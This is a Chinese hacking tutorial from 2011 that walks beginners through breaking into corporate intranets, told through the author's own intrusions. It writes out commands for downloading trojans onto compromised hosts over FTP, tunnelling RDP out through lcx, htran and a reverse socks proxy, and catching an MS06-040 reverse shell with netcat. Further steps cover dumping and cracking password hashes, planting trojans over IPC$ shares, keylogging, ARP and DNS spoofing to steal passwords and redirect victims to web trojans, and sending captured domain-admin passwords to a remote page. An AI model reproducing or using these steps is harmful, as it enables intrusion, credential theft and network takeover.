知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

精典详细内网渗透专题文章

发布时间:2011-04-04 12:02:59作者:知识屋

 经常在一些BBS里和一些杂志里看到,渗透XX网站,其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图12所示。

如果有的朋友现在还不了解路由器和交换机等什么意思,那应该好好补习一下了。这里在说一下什么叫内网,可能有的朋友认192.168.1.x这样的形式就是内网,前段时间QQ上一朋友挂出一台机器,告诉我有内网,我问他怎么判断的,他说执行ipconfig /all的时候看见内网地址了,其实这样判断太过草率,比如说我为了安全,我自己买了一个路由器那么在我的电脑执行ipconfig /all的时候IP地址也是内网,其实我有内网吗?是没有的。

在渗透内网之前我们先来了解一下局域网常见的拓扑结构,网络中的计算机等设备要实现互联,就需要以一定的结构方式进行连接,这种连接方式就叫做"拓扑结构",通俗地讲这些网络设备如何连接在一起的。目前常见的网络拓扑结构主要有以下四大类:1、星型结构,2、环型结构,3、总线型结构,4、星型和总线型结合的复合型结构。因为文章是讨论渗透内网的,所以每种的详细介绍,我就不列出来了,大家简单了解下就可以了,有兴趣的可以每一种都百度下。


可能刚入门的朋友不是很了解为什么内网而我们还能访问到呢,现在很多服务器都是用了硬件防火墙作的映射,也就是说他的所有服务器其实都在防火墙以后并且没有外网IP,可能有人会说,没有外网IP那我们访问它网站用的IP是什么呢?如果使用硬件防火墙配置过这种环境过朋友就明白了,这是现在很多包括国内大公司流行的NAT配置方法,这样相对来说比较安全,这样就需要我们在渗透的时候做端口映射。 

下面我把以前入侵渗透的几次内网过程并把一些思路,一些高手们的渗透经验,和一些用到或没用到的工具都综合的说一下。首先是通过脚本漏洞获得了一个WEBSHELL,服务器开的端口有21和80,并没有开过多的端口,没有装SU,pcAnywhere等第三方软件,wscript.shell为真,上传CMD能执行一些简单的命令,其他脚本木马权限一样,这台服务器上面就两个站,目录权限不是很严,发现D盘下有一个字符替换器,如3所示。

 

直接把下回本地看看是什么东东,原来是一个查找字符的工具,如4所示。

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

莫非这站以前让人搞过,管理员用来查找被改文件的,试了一下可以改名,如5,

 

那么好办了,我直接捆了一个木马在上面,把这个删掉,等着管理员上线吧,等了两天管理员还是没有上线,这么等下去也不是办法,只好把首页涂了,告诉他网站有漏洞,已被人植入木马,请查找木马之类的,并修改了几个重要文件的时间,果然管理员上线了。如6。

 

执行ipconfig /all果然有内网IP,7。

 

既然没开终端太不方便,我直接帮它开了吧,后来这台机器我又做了VPN,开3389可以用手工和工具都可以的,这里带给大家二个开3389的工具,都还比较不错,一个是火狐的开3389的工具,另一个是特南克斯,这里我用的是特南克斯的,至于怎么把程序传到肉鸡上办法很多,可以用远程程序直接传,也可以在本机架FTP服务器,用到20cn的FTP服务器,8。

 

设置好用户和密码后cmdshell里执行:

echo o 你架设FTP的IP>ftp.txt
echo hacklu>>ftp.txt       //写入ftp.txt用户名
echo 123456>>ftp.txt      //写入ftp.txt密码
echo bin>>ftp.txt       //二进制方式转输
echo get 11.exe>>ftp.txt   //将11.exe下载到肉鸡
echo bye>>ftp.txt      //断开FTP
type ftp.txt        //查看写入是否有错误 
ftp -s:ftp.txt              //执行FTP.TXT里的内容
del ftp.txt          //删除ftp.txt

这样我们就可以把11.exe下载到肉鸡运行就可以了,也可以用0803期杂志提到的VBS工具,适合不超过300KB的程序。把EXE转成BAT在上传,工具运行好会自动判断是2000系统或者2003系统,2000系统则自己重启,也可以自定义终端端口,运行结果如9所示。

[!--empirenews.page--]分页标题[/!--empirenews.page--] 

在执行netstat -an发现3389开放,当然这样直接连是连接不上的,因为我们外界是无法直接访问到内部机器的,但可以让内网机器来访问我们,比如现在流行的反弹木马,这样就需要我们做端口映射,说到端口映射工具当然代表作就是LCX写的工具了,首先在本机执行lcx -listen 99 9833,在肉鸡上执行lcx -slave 123.114.120.115 127.0.0.1 99 3389,意思是在本机监听99和9833端口,把99端口数据转到9833上面,然后把肉鸡的3389端口数据转到本机的99端口上,然后就可以拿连接器连接本地的9833端口了,如图10所示。
 

而奇怪的是这次却没有连上,那就用下教主的高级内网渗透工具Paris,工具其他功能不多说了,只说下端口映射的功能,传msxidc和vVXDc.dll到目标内网机器,在目标机器执行:msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22,在自己机器或者有公网IP的肉鸡:MAPServer.EXE -p22,这时候只要连接本机的或者公网IP肉鸡的22端口就可以了,在说一款比较不错的工具,htran.exe,能开启Socks5服务,但我们只说端口映射,命令:在公网肉鸡监听(临听任意两个端口):htran -p -listen 119 120,在内网的机器执行:htran -p -slave 公网肉鸡IP 119 127.0.0.1 3389,这样是把这个内网肉鸡的3389转发到公网肉鸡或者自己机器的119端口上,然后再用3389登陆器连接公网肉鸡的120端口。或者连接本机的120端口,如图11所示。

 

这几款工具各有优势,大家在渗透的时候根据需要自己选择吧。

   端口映射大家在渗透的时候可能已经不少朋友用过了,但很少看到有人是直接反弹代理来连接,反弹socks代理好处是我们直接可以连接内网的其它机器,而不需要在去转端口。最近“凋凌玫瑰”写了一个内网渗透利器---hd,使用方法如下,首先在本机监听:

c:>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ......

此命令是将连接进来的53端口的数据包连接到1180端口。

在对方机器上运行:

C:RECYCLER>hd -s -connect x.x.x.x 53
[+] MainSocket Connect to x.x.x.x:53 Success!
[+] Send Main Command ok!
[+] Recv Main Command ok!
[+] Send Main Command again ok!

上面的x.x.x.x为你的外网ip,这时我们接收到反弹回来的代理显示的情况。如图12。

 

然后在本机设置sockscap,设置在控制台的”文件”-“设置”里,控制台可以将你需要代理的程序放在上面,直接拖进去即可,控制台机的程序就可以进接连接内网的机器了。如直接用mstsc连接内网其它机器的3389,就可以上去登录管理。如[!--empirenews.page--]分页标题[/!--empirenews.page--]图13,14所示。






进了3389后我们第一步需要干什么?可能很多朋友都是留后门,像什么上帝之门、SHIFT后门,记录3389帐号等等。当然留什么后门好不在本文讨论之中。我个人比较喜欢抓HASH(哈希),一般是pwdump+lc5,一般我破解的时候数字加字母的10位组合在3个小时左右就可以破得出来,而且现在还有破解HASH的彩虹表,不过体积是很庞大的,在有前段时间在网上看见一篇文章,文章名字是“卸载补丁去除保护 获取Windows 2003密码”,大致意思是卸载Windows2003 SP1/SP2,因为windows 2003 +SP0才可以利用findpass从winlogin进程中抓出系统账号明文密码,抓出密码在重安装上补丁。我个人没有实验过,此方法很暴力,我个人也不推荐这么做,很容易被发现的。


那什么是HASH呢?Hash简单点讲就是把任意一段数据经过某种算法生成一段唯一的固定长度的数据。Hash,一般翻译做"散列",也有直接音译为"哈希"的,通过散列算法,变换成固定长度的输出,该输出就是散列值。HASH主要用于信息安全领域中加密算法,他把一些不同长度的信息转化成杂乱的128位的编码里,叫做HASH值. 也可以说,hash就是找到一种数据内容和数据存放地址之间的映射关系。对于哈希菜鸟也可以这么理解,即保存电脑上管理员登录的一种加密后的密码,至于什么详细加密算法,有兴趣的朋友可以百度下,例如我这里用的是SAMInside抓HASH,程序打开后我们选择小人这里,点击使用LSASS输入本地用户,如图15。

 

这样计算机的用户名和HASH值就会出现在列表里,如图16。

 

直接点右上方的开始就可以破解密码了,图17所示,

 

也可以导出用LC5破解,在选择--文件--输出用户到PWDUMP,这样把HASH保存为文件文件,图18。

[!--empirenews.page--]分页标题[/!--empirenews.page--] 

也可以用PWDUMP抓,如图19,

 

最后我们把内容复制下来保存文本文件用LC5破解,LC5的安装非常的简单,一直下一步即可。程序自己带注册机,我们在注册一下,完事后我们在程序主页面导入刚才保存的hash.txt,点击导入按钮(第六个),在选择从PWDUMP文件,用户列表就会显示出来了,在点击开始就可以破解了,如

图20,21所示。

 







而对于2000的系统我们直接可以用MT读出密码,直接运行mt -findpass,如22所示

 

,为什么要破解本机密码,因为在内网渗透的过程中抓出一台管理员的密码是很重要的,现在我们有了内网一台机器了,当然要继续渗透下去,在这里我总结一下几种方法,方法一、扫描弱口令,ipc$连接。方法二、靠自己的运气和管理员的懒惰加社会工程学。方法三、溢出。方法四、arp欺骗,DNS欺骗。方法五、域结构下的渗透。这里简单的总结五方面,但是每一方面具体利用起来又包括很细节在里面。

方法一、扫描弱口令,ipc$连接。

可以用XScan-v3.3扫描器扫一下内网,设置好IP和端口,端口设置可以查看本机装有什么软件,例如本机装有radmin,pcAnywhere等等,那我们就扫描4899,5631等端口,如23,

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

然后用本机的知道的密码去连接。当然如果改成别的端口我们根据情况转换一下,有的时候在外网的机器很坚固,到了内网的时候就很脆弱了。当然现在机器已经很少弱口令了,但是我们有本机管理员帐户和密码,管理员为了方便往往都设置成一样的,因为做系统的时候做完一台直接GHOST别的系统。而ipc$连接可以是说是非常古老和经典的。

IPC 是Internet Process Connection的缩写,也就是远程网络连接。WindowsNT/2000/XP/2003默认都提供了IPC$管道连接,就是在两个计算机进程之间建立通信连接。打个比方,IPC连接就像是挖好的地道,程序可通过地道访问远程主机。默认情况下,IPC是共享的,也就是说微软已经为我们挖好了这个地道(IPC),因此,这种基于IPC的入侵也常常被简称为IPC入侵。 IPC 后面的$是共享的意思,不过是隐藏的共享,微软系统中用“$”表示隐藏的共享,比如C$就是隐藏的共享C盘。也就是说C盘是共享的。ipc$连接这个只能说是管理员开的共享,严格来说不能算一个漏洞,目标主机还需满足两个条件:1、目标主机开启了ipc$共享 ;2、拥有目标主机的管理员帐号和密码 。 当年在2000系统的时候ipc$入侵可以说是风扉一时。

这里我用两台XP做演示,打开命令提示符在CMD下输入:net use IPipc$ "password" /user:"username" 建立非空连接,接着copy 路径*.exe IP共享目录名,向远程主机复制文件,接着net time IP,查看远程主机的当前时间,图24所示

 

,接着就可以用计划任务运行我们COPY过去的程序了,执行at ip 时间 程序名,远程添加计划任务,图25所示。

 

可以按照我们规定的时间内运行程序,如果对方禁止了计划任务,默认是开启的,我们可以把文件复制到对方启动目录,先执行net use z: IPc$,是把对方C盘映射到本机Z盘上,这样我们直接将木马放在启动目录,如图26所示。

 

等复制完了想断开了可以用命令,net use z: /del /y,这样可以删除映射的z盘 如果有朋友也手工输入命令麻烦,也可以用20CN的IPC扫描器,可以同步植入木马。如27所示。

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

在域控的环境中,我们只要得到域控密码就可以直接用ipc连接管理员机器种马。后面会介绍域环境下的渗透。


方法二、靠自己的运气和管理员的懒惰加社会工程学。(推荐非安全出的黑客社会工程学攻击一书)

这里所说的运气是刚才说过的,比如说管理员为了方便设置“密码一卡通”扫描内网开3389端口的机器,用破出来的本机密码连接所有开3389的机器,我曾经入侵一个台湾的内网就是密码都是一样的,或者可以在本机装上键盘记录,安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB网页密码等等,这样也可以得到管理员的很多信息。

这里我用的是键盘记录大师,首先运行keyboardlog.exe,然后点"开起监控",注意这个程序只要运行一次就可以了,以后开机的时候自动运行。程序运行后如图28的界面,

 

我们点击开始监控就可以了。这个工具可以记录中文,这点对于有些机器还是不错的,记录的文件可以设置,方法为修改config.ini里的文件. 格式为如 c:1111.txt,然后再运行keyboardlog.exe,点击停止监控,然后再重新点开始监控。如29是记录到的内容。

 

至于记录的什么内容就要靠大家去分析然后配合社会工程学了。


方法三、内网溢出。

溢出从技术角度可以分为堆溢出和栈溢出,这点我们先不说,从另一个角度则分为远程(remote)溢出和本地(local)溢出,远程溢出也就是通过对方的一些网络上的服务对我们提交的的数据没有严格的检查,我们提交一些精心构造的数据,可以迫使对方的主机执行我们指定的动作:比如添加用户,打开端口,反弹一个SHELL给我们等等。

这种方法放在现在来说可以说是成功率很低的,因为现在基本都是自己打补丁了,如果在向后退个二三年还是可以的,但并不代表没有一点不可能,06的时候朽木在腾讯内网的时候就是靠嗅域管理员的哈希和MS06035溢出其他的机器,对于比较火的05年的MS05039,06年的MS06035、06040,07年DNS溢出等等,这就需要我们多关注一下“http://www.microsoft.com/china/technet/Security/current.mspx”微软漏洞发布的地方,当然内网溢出不一定非得靠系统漏洞,可以查看本机装有那些第三方程序,然后溢出其他机器的,这里我以06040+2000系统为例,首先我们用Superscan3.0扫描内网开放445端口,如30所示。

 

在本机用NC监听1234端口,执行nc -l -v -p 1234,如31,

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

然后用另一个CMD窗口执行,ms06040rpc 对方IP 本机IP 1234 1,这样用NC监听的端口会返回了对方的CMDSHELL,如32、33所示。




 

在得到CMDSHELL之后,是添加用户或者给机器中木马,就看见大家爱好了。另外也可以用去年比较火的DNS溢出,DNS服务一般开放53端口。DNS服务器在有的时候就是域服务器,关于域环境下参考方法五。





方法四、arp欺骗,DNS欺骗。

这个方法是比较实用,所以多介绍一下。但同是也是比较容易暴露自己的,不少同行在C段方面和内网方面用的都是ARP欺骗,不少菜菜可能还记得杂志经常看到嗅探的时候用到的ARP欺骗,我们再来复习一下吧。首先在内网机器输入arp -a,如34所示。

 

这里第一列显示的是ip地址,第二列显示的是和ip地址对应的网络接口卡的硬件地址(MAC),第三列是该ip和mac的对应关系类型。可见,arp是一种将ip转化成以ip对应的网卡的物理地址的一种协议,或者说ARP协议是一种将ip地址转化成MAC地址的一种协议。它靠维持在内存中保存的一张表来使ip得以在网络上被目标机器应答。

1、什么是MAC地址、MAC地址也叫物理地址,硬件地址或链路地址,同网络设备制造商生产时写在硬件内部。IP地址与MAC地址在计算机里都是以二进制表示的。IP地址是32位的,而MAC地址则是48位的。MAC地址的长度为48位(6个字节),通常表示为12个16进制数,每2个16进制之间用冒号隔开,如08:00:20:0A:8C:6D就是一个MAC地址,其中前3位16进制数08:00:20代表网络硬件制造商的编号,它由IEEE(电子与电子工程师协会)分配,而后3位16进制数0A:8C:6D代表该制造商所制造的某个网络产品(如网卡)的系列号。输入ipconfig /all就可以看见本机的MAC地址。

2、什么是ARP,大家都知道计算机通信是要有IP地址的吧!可是在局域网中,计算机之间的通信是只靠MAC地址来发送数据的。ARP是一种协议,用来实现IP地址到MAC地址的转换,假设192.168.1.1要发一个数据给192.168.1.101,它就会发出ARP广播包问:“谁是192.168.1.101?我要你的MAC地址!”这时候192.168.1.101会回答:“我是192.168.1.101,我的MAC是AA-AA-AA-AA-AA-AA。”然后192.168.1.1就会把这个回答记录下来,然后再发数据给192.168.1.101的时候就直接构造目地地址为AA-AA-AA-AA-AA-AA的数据包发送。

3、什么是ARP欺骗、经过刚才的ARP查询的过程我们知道,在询问的过程中,国为不知道到底谁才是192.168.1.101,所以192.168.1.1发出的是广播包来询问,其它的电话虽然也收到了这个包但是并不回答。假如现在有个人,192.168.1.102居心不良,想冒充192.168.1.101,他也可以给192.168.1.1发一个回答的数据包说:“我才是192.168.1.101,我的MAC地址是BB-BB-BB-BB-BB。”那么192.168.1.1就会把原先的那条记录从MAC地址表中删除掉,写入新的这个地址对应关系,这就是ARP欺骗。

4、什么是网关、在局域网中,所有的电脑可能是共用一个网络出口,这个出口就是网关了。网关可以是一台电脑,也可以是一个路由器的某个接口,它一样有自己的IP地址,局域网中所有的要发到外部的数据包都直接递交给网关,网关负责将这个数据包传递到远程网络,再将外界返回的数据分发给局域网中的指定电脑。



   TCP/IP协议是如此的脆弱,ARP协议在设计的当初并没有充分的考虑到安全问题,所以今天才出现N多的ARP欺骗工具,在介绍工具之前,我们再来谈谈服务器在机房中的情况。一般而言,现在流行的的主机托管方式置放的服务器是和很多别的服务器放在一个机柜上,大家共用一个交换机共享100M的带宽,这样就造成了一个问题,那些没有做端口隔离的的机房(绝大多数机房都是这样的)每个交换机下的所有服务器构成一个局域网。在这个局域网下,大家就可以玩ARP欺骗了。[!--empirenews.page--]分页标题[/!--empirenews.page--]

说到ARP嗅探的工具要先提一下有一定的位置的cain,官方最新版为4.918,我们先要进行安装,如图35所示。

 

直接NEXT下一步就可以了,安装好我们运行CAIN,点击Sniffer,在选择工具栏第二个按钮,在点击十字架,在弹出对话框中我们选择子网中所有计算机,如36所示。

 

在Configure选项里我们可以根据需要选择端口,如21、80、3389等。如37所示。

 

这时在选择下面的ARP,十字按钮是灰色的,我们点击一下空白处,在选择十字按钮,在弹出的对话框里左边选择网关,右边选择欺骗的IP。最后点开始嗅探,上面第二个按钮。如38所示。

 

 

这样就能嗅到数据了,39是嗅到的HTTP密码。

 

另外如果嗅到了3389密码我们在上面打开文档,在里面可以找到密码,如40所示。



大家在用CAIN嗅探的时候可能遇到过这样的情况,数据一大就当机了,过了很少时间都连不上了,所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。这样会大大的减少当机的可能性。如果看到丢包率超过10%就要注意啦,赶紧停掉,看看那里没设置好吧。另外提供一个“chong”写的BAT程序,在开嗅的时候运行它就可以了。[!--empirenews.page--]分页标题[/!--empirenews.page--]

======start=========
:ping
ping g.cn
IF ERRORLEVEL   1 GOTO reboot
IF ERRORLEVEL   0 GOTO ping
:reboot
iisreset /reboot
======end=========
这里的g.cn你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为当机了 (事先自己先测试下)。

在说下DSN欺骗,我们看下DNS是怎样工作的,DNS是全称是Domain Name Server,既域名服务器。当一台主机发送一个请求要求解析某个域名时,他会首先把解析请求发到自己的DNS服务器上。如果内网里的192.168.1.101要访问百度www.baidu.com,但不知道其IP地址,这时192.168.1.101主机询问网关192.168.1.1,www.baidu.com的IP是多少,如果这时候我们将冒充网关192.168.1.1返回给192.168.1.101他一个特定的含有网页木马的IP,这样就实现了DNS域名欺骗。



首先用前面的介绍的列出内网机器,然后在ARP里选择ARP-DNS,点击空白处激活十字按钮,弹出一个DNS欺骗对话框,在请求DNS域名栏中填入对方要访问的网站,如www.baidu.com,然后在用来改写响应的IP地栏,如图41所示。

 

 

而我们响应的地址可以是一个网页木马的地址,这里我以网关为例,也就是说192.168.1.101访问www.baidu.com的时候会转向192.168.1.1的页面,我们先来访问一下192.168.1.1,如图42所示,

 

我们在192.168.1.104的机器上装CAIN开始DSN欺骗后访问百度网页,如图43所示。

 

是不是也和192.168.1.1一样了,如果我们在本架设一个HTTP服务器,挂上一个网马后,就能欺骗访问者了,当然如果想做的更像,可以制作一个和欺骗主页一样的页面。




方法五、域结构下的渗透。

在入侵域结构内网之前我们先来了解一下什么是域,可能大家对工作组比较熟悉了,而域和工作组是不一样的,工作组是一群计算机的集合,它仅仅是一个逻辑的集合,各自计算机还是各自管理的,你要访问其中的计算机,还是要到被访问计算机上来实现用户验证的。而域不同,域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可了。也就是域用户登录,超级大的权限。而域还可以扩展,像域树,域林。在一个网络中既可以有多个多级子域、域树,还可以有多个林。[!--empirenews.page--]分页标题[/!--empirenews.page--]

   为了大家好理解,我这里举个例子,例如一个内网是一个大楼,而每层的每个房间是一台计算机,当然每个房间的钥匙只有房间的主人才拥有,但大楼建立一个保安室,而这保安室为了管理方便有一把可以打开任意房间的钥匙。前题是这个房间允许加入保安的管理范围内,这个保安室就是域控制器,当然在形象的说大楼可以是10层,而每一层都有一个保安室,也可以有一个总的保安室。当然在往大的说也可以有很多大楼,大楼与大楼之间为了方便也可以建立共享。如活动目录的域,活动目录可以贯穿一个或多个域。在独立的计算机上,域即指计算机本身,一个域可以分布在多个物理位置上,同时一个物理位置又可以划分不同网段为不同的域,每个域都有自己的安全策略以及它与其他域的信任关系。当多个域通过信任关系连接起来之后,活动目录可以被多个信任域域共享。在往回说每台机器像一个树叶,而我们控制了树叶,还想控制树杈,而最后还想控制这个大树,这时候就到域根了。而一棵树是在一片森林当中的。

在入侵内网的时候,一般先用net view查看内网的情况,列出共享的域、计算机或资源的列表。如图44所示。

 

如何判断有没有域呢,其实一个ipconfig /all基本就看出来了,大家在回到7当中,注意一下第二项,也就是Primary Dns Suffix这项,从这个命令我们可以得知,存在一个域xxxx-cc.com,我们ping一下域xxxx-cc.com,得到域服务器的ip。如45所示。

 

或者用命令net config workstation,会显示本机计算机名和管理员用户名,工作站的域DNS名称及登录到的域,如46所示。

 

接着执行net localgroup administrators来看一下本机在域里面的角色,如47所示。

 

看来只是一个普通域用户。我们再来查看一下域里面有多少的用户,执行net user /domain,域里面的用户很多,如48所示。

 [!--empirenews.page--]分页标题[/!--empirenews.page--]

域里面这么多用户,那么我们再查看一下域管理员有哪些,执行net group "domain admins" /domain,貌似只有一个域管理员。如49所示。

 

大家知道在域管理网络中只要搞定了域管理员内网一切机器都OK了,现在域服务器有了,域管理员有了。思路呢?可以用上面的几种方法来入侵域服务器,如ARP嗅探域服务器,而域管理器在很多时候也是DNS服务器,也可以尝试DNS溢出等。这里我为大家推荐一个Winlogon劫持记录3389密码小工具,原作者为“lovemfc”,我们用这个不是记录本机登录的3389密码,当然本机也是可以记录的,更不错的是可以记录域管理员登录本机的密码,因为域管理员是有权限登录下面每台用户的机器的。缺点是记录密码的东西只能保存本机上,而ASM根据这个写了一个发信版的生成器,这就方便我们大家了,程序运行后如图50

 

选择好接受的ASP地址后,生成出来CreateServer.exe,直接在服务器上运行即可,post.asp会在你的URL地址下生成key.txt。适用范围2003系统,51是我记录到本机管理员和域管理员的密码

 

,这下就可以纵横整个内网了。在服务器上扫描开放3389端口的,用域管理员登录全部OK,在域控的环境中,我们只要得到域控密码也可以直接用ipc连接管理员机器种马。最后登录内网几台机器抓纪念一下,如52。

 

最后说一下本文章只做菜鸟渗透入门文章,当然内网渗透还有其他深入的技巧,如主动会话劫持等,因本人时间和水平都有限,文章中不足之处欢迎大家批评指正。 

(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜